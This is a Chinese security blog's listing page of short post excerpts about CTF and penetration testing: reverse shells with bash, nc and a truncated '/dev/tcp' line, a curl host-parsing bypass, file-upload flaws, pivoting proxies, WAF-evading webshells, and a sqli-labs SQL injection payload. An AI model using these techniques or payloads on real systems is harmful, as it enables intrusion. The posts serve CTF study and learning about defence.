摘要: 01 前言 CTF中一些命令执行的题目需要反弹shell,于是solo一波。 02 环境 win10 192.168.43.151 监听端 装有nc kali 192.168.253.128 反弹端 自带nc/bash/curl... 03 Test it 1.bash反弹 ***/dev/[tcp 阅读全文
posted @ 2019-04-02 16:40 p0pl4r 阅读(3834) 评论(0) 推荐(0) 编辑
摘要: 进入php后台模式 查看基本设置 阅读全文
posted @ 2019-04-02 15:26 p0pl4r 阅读(148) 评论(0) 推荐(0) 编辑
摘要: 1.利用curl的变量解释符$ php版本 利用代码 Bash将$baidu分析为一个空变量,并且使用curl请求了sec-redclub<empty> .com。 然而这只发生在curl语法中。 实际上,正如上面的屏幕截图所示,由parse_url()解析的主机名仍然是 sec-redclub$b 阅读全文
posted @ 2019-04-02 15:25 p0pl4r 阅读(956) 评论(0) 推荐(0) 编辑
摘要: 1.浏览器下ctrl+F可实现文本查找 其余还有 2.将软件目录放到环境变量Path下,Ctrl+R输入.exe软件名即可调用。 (tips:可把常用软件建立快捷方式,统一放在某一目录下噢!) 阅读全文
posted @ 2019-04-02 12:49 p0pl4r 阅读(93) 评论(0) 推荐(0) 编辑
摘要: 0x01 概要说明 文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接。但是想真正把这个漏洞利用好却不那么容易,其中有很多技巧,也有很多需要掌握的知识。俗话说,知己知彼方能百战不殆,因此想要研究怎么防护漏洞,就要了解怎么去利用。此篇文章主要分三部分:总结一些常见的上 阅读全文
posted @ 2019-04-01 07:51 p0pl4r 阅读(346) 评论(0) 推荐(0) 编辑
摘要: 0. 序 在综合的渗透过程中,Shell is Only the Beginning 。 内网渗透无论是难度还是广度都不亚于前端入侵。 介于Webshell 和 内网渗透之间的是 代理转发工具。 一个高效稳定代理尤为重要。我们经常用的代理转发工具包括:端口转发工具、Web代理脚本、Shell反弹脚本 阅读全文
posted @ 2019-04-01 07:19 p0pl4r 阅读(739) 评论(0) 推荐(0) 编辑
摘要: 1.mysql执行语句拿shell 2.利用md5绕过waf 注:default失败!其他编码成功! 3.get_defined_vars()函数马:在过滤$的情况下可使用 4.不含字母数字马 注:只能菜刀连接! 或者 https://www.freebuf.com/articles/web/173 阅读全文
posted @ 2019-03-31 18:26 p0pl4r 阅读(1095) 评论(0) 推荐(0) 编辑
摘要: sqli11: post:uname=xx' order by 2#&passwd=bla&submit=Submit(判定字段为2) 解释下为什么结果不是admin,这是sql执行的顺序问题 sqli12: sqli13: 不会返回登陆信息,只会提示成功与否。 盲注! sqli14: sqli15 阅读全文
posted @ 2019-03-28 20:56 p0pl4r 阅读(301) 评论(0) 推荐(0) 编辑
摘要: https://www.bugbank.cn/q/article/5983de41cbb936102d397781.html 阅读全文
posted @ 2019-03-25 13:11 p0pl4r 阅读(121) 评论(0) 推荐(0) 编辑
摘要: import sys import time def view_bar(num,total): rate = num / total rate_num = int(rate * 100) r = '\r%d%%%s>' % (rate_num,'='*num) sys.stdout.write(r) 阅读全文
posted @ 2019-03-25 12:47 p0pl4r 阅读(102) 评论(0) 推荐(0) 编辑